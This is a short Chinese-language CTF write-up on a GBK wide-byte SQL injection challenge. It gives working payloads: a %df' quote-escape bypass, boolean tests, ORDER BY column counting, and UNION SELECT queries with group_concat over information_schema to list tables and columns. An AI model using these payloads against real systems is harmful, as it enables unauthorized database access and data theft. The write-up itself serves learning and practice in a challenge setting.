题目:GBK SQL injection
解析:
1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清题目,GBK,接下来利用宽字节进行注入
2.使用'%df' '进行注入,emm报错,于是加入老手段,and 1=1 %23,ok,没报错,说明成功
3.继续改参数,1=2时,没有任何信息,找到注入点
4.利用order by 查询列数,当查询2时,显示正常,那么查询3时,显示错误,确定为2列。
5.既然查询到列,使用联合查询,union select 1,2 %23,
6.获取当前数据库:union select 1,database() %23
7.获取当前数据库名: id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.TABLES where table_schema=0x7361652d6368696e616c6f766572 %23
group_concat(table_name) 分组以后,把想要显示的列通过gruop_concat()函数拼接在一起。
information_schema.TABLES 切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。
8.获取表名(ctf-4)id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.COLUMNS where table_name=0x63746634 %23